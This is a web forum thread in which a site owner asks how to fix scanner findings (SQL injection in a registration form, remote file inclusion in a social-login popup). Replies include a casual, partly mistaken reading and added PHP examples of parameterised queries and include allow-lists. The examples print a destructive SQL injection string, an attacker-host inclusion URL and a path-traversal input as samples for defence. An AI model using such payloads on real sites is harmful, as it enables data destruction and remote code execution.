agree, agree2 in register_form.php
Body
I don't know anything about server security, so I'm asking here.
I'm using Smile Server, and it has a feature called vulnerability check. I ran it and got a report back, and it contains the two items below. What do I need to do to secure the site?
1)
SQL injection may be possible
/bbs/register_form.php param agree, agree2
Solution
Do not trust client side input, even if there is client side validation in place.
In general, type check all data on the server side.
If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'
If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.
If database Stored Procedures can be used, use them.
Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!
Do not create dynamic SQL queries using simple string concatenation.
Escape all data received from the client.
Apply a 'whitelist' of allowed characters, or a 'blacklist' of disallowed characters in user input.
Apply the principle of least privilege by using the least privileged database user possible.
In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.
Grant the minimum database access that is necessary for the application.
2)
Remote File Inclusion
/plugin/social/popup.php?provider=google&url=http%xxxFwww.google.com%xxxFsearch%xxxDOWASP%xxxAP param url
Solution
Phase: Architecture and Design
When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.
For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap provide this capability.
Phases: Architecture and Design; Operation
Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by your software.
OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows you to specify restrictions on file operations.
This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.
Be careful to avoid CWE-243 and other weaknesses related to jails.
For PHP, the interpreter offers restrictions such as open_basedir or safe_mode which can make it more difficult for an attacker to escape out of the application (note: safe_mode was removed in PHP 5.4, so on current PHP only open_basedir remains). Also consider Suhosin, a hardened PHP extension, which includes various options that disable some of the more dangerous PHP features.
Phase: Implementation
Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."
For filenames, use stringent whitelists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a whitelist of allowable file extensions, which will help to avoid CWE-434.
Phases: Architecture and Design; Operation
Store library, include, and utility files outside of the web document root, if possible. Otherwise, store them in a separate directory and use the web server's access control capabilities to prevent attackers from directly requesting them. One common practice is to define a fixed constant in each calling program, then check for the existence of the constant in the library/include file; if the constant does not exist, then the file was directly requested, and it can exit immediately.
This significantly reduces the chance of an attacker being able to bypass any protection mechanisms that are in the base program but not in the include files. It will also reduce your attack surface.
Phases: Architecture and Design; Implementation
Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.
Many file inclusion problems occur because the programmer assumed that certain inputs could not be modified, especially for cookies and URL components.
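Added example (not code from the original post or from Gnuboard's register_form.php) showing what the first finding means and the fix the report's "Solution" describes: a server-side type check on the agree/agree2 values followed by a parameterised query, with the injected statement shown next to it. It assumes a table mb_agree(mb_id, agree, agree2), uses an in-memory SQLite database through PDO in place of the site's real MySQL server, and the request values and payload are constructed here.

```php
<?php
declare(strict_types=1);

// Example for the "SQL injection may be possible: param agree, agree2" finding.
// Assumed schema: mb_agree(mb_id, agree, agree2). SQLite in memory stands in for
// MySQL; the only thing that changes for MySQL is the DSN. Requires pdo_sqlite.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE mb_agree (mb_id TEXT NOT NULL, agree TEXT NOT NULL, agree2 TEXT NOT NULL)');

// Vulnerable shape: the checkbox values are pasted straight into the SQL text.
// This only builds the string, so the reader can see what the scanner is probing for.
function build_vulnerable_sql(string $mb_id, string $agree, string $agree2): string
{
    return "INSERT INTO mb_agree (mb_id, agree, agree2) VALUES ('$mb_id', '$agree', '$agree2')";
}

// Step 1 of the fix: type check on the server. A consent checkbox has exactly one
// legitimate value, so anything else is treated as an attack or a bug, not as data.
function validate_agree(string $value): string
{
    if ($value !== '1') {
        throw new InvalidArgumentException('agreement flag must be exactly "1"');
    }
    return $value;
}

// Step 2 of the fix: the query text is fixed and the values are bound parameters,
// so quotes or comment markers inside them can never change the statement.
function save_agree(PDO $pdo, string $mb_id, string $agree, string $agree2): int
{
    $stmt = $pdo->prepare('INSERT INTO mb_agree (mb_id, agree, agree2) VALUES (:mb_id, :agree, :agree2)');
    $stmt->execute([
        ':mb_id'  => $mb_id,
        ':agree'  => validate_agree($agree),
        ':agree2' => validate_agree($agree2),
    ]);
    return $stmt->rowCount();
}

function count_rows(PDO $pdo): int
{
    return (int) $pdo->query('SELECT COUNT(*) FROM mb_agree')->fetchColumn();
}

// Constructed request: a scanner-style payload sent in agree2.
$payload = "1'); DELETE FROM mb_agree; --";

// The concatenated version turns one INSERT into an INSERT followed by a DELETE,
// with the rest of the original statement commented out.
echo build_vulnerable_sql('newuser', '1', $payload), PHP_EOL;

// Hardened path: normal input is stored...
save_agree($pdo, 'newuser', '1', '1');
echo 'rows after valid input: ', count_rows($pdo), PHP_EOL;

// ...and the payload is rejected by validation before it reaches the database.
try {
    save_agree($pdo, 'attacker', '1', $payload);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}

// Even with validation left out, a bound parameter is stored as a literal string
// and never executed: the row count goes up by one, nothing is deleted.
$stmt = $pdo->prepare('INSERT INTO mb_agree (mb_id, agree, agree2) VALUES (?, ?, ?)');
$stmt->execute(['attacker', '1', $payload]);
echo 'rows after binding the payload as data: ', count_rows($pdo), PHP_EOL;

// The report's least-privilege point, for MySQL, is a grant like this for the
// account in the site's DB config instead of using root:
//   GRANT SELECT, INSERT, UPDATE, DELETE ON gnuboard.* TO 'webapp'@'localhost';
```

Escaping (the report's "Escape all data received from the client") is the fallback for places where a value cannot be bound, such as a table or column name; for ordinary values, binding is both simpler and safer than escaping.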
Answer 3
Had a look with some help from Google Translate~
Turns out it's the solution text
I figured this probably isn't a comment for me to leave, but I was bored so here's my personal take
The gist:
1. /bbs/register_form.php, this is a problem
2. /plugin/social/popup.php, this seems to be a problem
Here, #1 seems to be saying malicious file attachments are possible
#2 is hard to guess..
ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt" (what feature is that~ I'm curious too)
PHP features can be disabled.
- something about not relying on blacklists~
- seems to be about not letting outsiders touch library constants outside the document root
- whatever the case, remember that the applications in there, or API calls, can indirectly screw you over, something like that
(I didn't read it carefully, so there are lots of errors, just take it as a quick skim ~ can't agonize over it for 3 hours, not like I'm getting paid for it
I'm not a skilled developer, just someone who tries~ so don't take my word for it
Feels like drunk rambling, so I'll stop here~
2) For the Google social login one there's more content below, so I'm attaching it.
Description
Remote File Include (RFI) is an attack technique used to exploit "dynamic file include" mechanisms in web applications. When web applications take user input (URL, parameter value, etc.) and pass them into file include commands, the web application might be tricked into including remote files with malicious code.
Almost all web application frameworks support file inclusion. File inclusion is mainly used for packaging common code into separate files that are later referenced by main application modules. When a web application references an include file, the code in this file may be executed implicitly or explicitly by calling specific procedures. If the choice of module to load is based on elements from the HTTP request, the web application might be vulnerable to RFI.
An attacker can use RFI for:
* Running malicious code on the server: any code in the included malicious files will be run by the server. If the file include is not executed using some wrapper, code in include files is executed in the context of the server user. This could lead to a complete system compromise.
* Running malicious code on clients: the attacker's malicious code can manipulate the content of the response sent to the client. The attacker can embed malicious code in the response that will be run by the client (for example, JavaScript to steal the client session cookies).
PHP is particularly vulnerable to RFI attacks due to the extensive use of "file includes" in PHP programming and due to default server configurations that increase susceptibility to an RFI attack.
"dynamic file include"
For example, I guess it's something like include('header.php'); that's the problem (I'm curious too)
Dynamic include: include($_GET['file'] . '.php');
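Added example (not from the original post and not Gnuboard's /plugin/social/popup.php) covering both the report's "Architecture and Design" fix in the question (a fixed map from known inputs to real files, reject everything else) and the dynamic include shown just above. It also applies the same idea to the url parameter from the finding. The provider names, file names, allowed hosts and the _SOCIAL_POPUP_ guard constant are made up for the demonstration, the include files are written to a temp directory so it runs offline, and the request is constructed here.

```php
<?php
declare(strict_types=1);

// Vulnerable shape from the thread (do not use): the include target comes from the request.
//   include($_GET['file'] . '.php');
// With allow_url_include=On, file=http://attacker.example/x makes PHP fetch and run the
// attacker's code (RFI); with it off, path traversal to local files is still possible.

// 1) Fixed map: a small set of known provider names -> the real file names.
//    Anything not in the map is rejected before include() ever sees it.
const PROVIDER_FILES = [
    'google'   => 'google.php',
    'naver'    => 'naver.php',
    'facebook' => 'facebook.php',
];

function provider_include_path(string $baseDir, string $provider): string
{
    if (!array_key_exists($provider, PROVIDER_FILES)) {
        throw new InvalidArgumentException("unknown provider: $provider");
    }
    $path = realpath($baseDir . '/' . PROVIDER_FILES[$provider]);
    // Defence in depth: the resolved path must still sit under the plugin directory.
    if ($path === false || strpos($path, realpath($baseDir) . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('provider file outside plugin directory');
    }
    return $path;
}

// 2) Return URL from the request: accept only a path on this site, or https to a host
//    we know; everything else (other hosts, "//evil", "/\evil", javascript:) falls back.
const ALLOWED_RETURN_HOSTS = ['www.example.com'];   // assumed allow-list

function safe_return_url(string $url, string $fallback = '/'): string
{
    $parts = parse_url($url);
    if ($parts === false) {
        return $fallback;
    }
    // "/path" but not "//host" or "/\host", which browsers treat as protocol-relative.
    if (preg_match('#^/(?![/\\\\])#', $url) === 1 && !isset($parts['host'])) {
        return $url;
    }
    if (($parts['scheme'] ?? '') === 'https'
        && in_array($parts['host'] ?? '', ALLOWED_RETURN_HOSTS, true)) {
        return $url;
    }
    return $fallback;
}

// --- Demo: constructed include files in a temp directory standing in for /plugin/social/
$base = sys_get_temp_dir() . '/social_demo_' . getmypid();
mkdir($base);
foreach (PROVIDER_FILES as $name => $file) {
    // Each include file carries the "fixed constant" guard from the report: if it is
    // requested directly, the constant is missing and the file exits immediately.
    file_put_contents("$base/$file",
        "<?php\nif (!defined('_SOCIAL_POPUP_')) exit;\nreturn 'login with $name';\n");
}
define('_SOCIAL_POPUP_', true);

$_GET = ['provider' => 'google', 'url' => '//evil.example/phish'];   // constructed request

$page = include provider_include_path($base, $_GET['provider']);
echo $page, PHP_EOL;
echo 'return url: ', safe_return_url($_GET['url']), PHP_EOL;
echo 'return url: ', safe_return_url('/bbs/login.php?x=1'), PHP_EOL;
echo 'return url: ', safe_return_url('https://www.example.com/bbs/board.php'), PHP_EOL;

foreach (['../../etc/passwd', 'http://attacker.example/shell', 'GOOGLE'] as $bad) {
    try {
        provider_include_path($base, $bad);
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), PHP_EOL;
    }
}

foreach (PROVIDER_FILES as $file) {
    unlink("$base/$file");
}
rmdir($base);
```

Alongside the code change, check php.ini: allow_url_include should be Off (it is by default) and open_basedir set to the site's directory, so that even a bug elsewhere cannot pull in a remote file or read outside the web root.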